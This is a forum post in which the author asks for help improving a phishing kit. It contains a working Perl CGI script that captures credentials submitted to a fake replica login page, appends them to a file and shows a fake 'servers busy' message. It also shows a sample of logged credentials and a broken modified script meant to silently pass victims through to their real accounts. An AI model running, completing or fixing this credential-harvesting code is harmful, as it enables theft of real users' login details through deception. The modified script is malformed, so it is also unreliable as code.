sectest

Hi all, to the point. I am a security pen tester, I have come to a bit of a stop point in a project that I think someone here may be able to help with.
I have a fake replica login page that is served locally from apache, the login action links to a cgi/html script, the scrpt stores the victims login details. Now this all works fine the problem is, the cgi/html page just shows, a message Sorry our servers are busy please try again later the victims details are logged, but instead of the victim being shown this page/message im trying to forward the stdin information and to log them straight into their account so they would be none the wiser.

Below is the original cgi script that shows the obvious our servers are busy page
below that is my modified cgi script, that im having the problems with
at the bottom is the output of the stored file

The original cgi script that throws the server busy page, and stores the victims details



#!perl
# chmod +x this file and stick it in your cgi-bin directory

# CHANGE THESE VARIABLES $page_title $page_message $page_image
$page_title = "BUSY SERVERS";
$page_message = "SORRY IT LOOKS LIKE OUR SERVERS ARE BUSY TRY LATER";
$page_image = "SERVER.jpg";

print "Content-type:text/html\n\n";

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# return HTML message to user
print "<html><head><title>$page_title</title></head><body>";
print "<center>";
print "<img src=\"/$page_image\"><br><br>";
print "$page_message<br><br>\n";
print "</body></html>";


Here is what the saved pass file looks like

url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0


Here is the modified cgi the one im having trouble with, the one that needs to store the pass and forward them to their account

#!perl
# chmod +x this file and stick it in your cgi-bin directory


print "Content-type:text/html\n\n";

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# return HTML message to user
<html>
<body>

<form method="post" action="target login">


<input type="hidden" name="page" value="$page">

username: <input type="text" name="login_email" value="$key" size=10><br>
password: <input type="password" name="login_password" value="$FORM" size=10><p>


<input type="submit" value="Log In">

</form>

</body>
</html>

Cheers in advanced to whom ever may try to help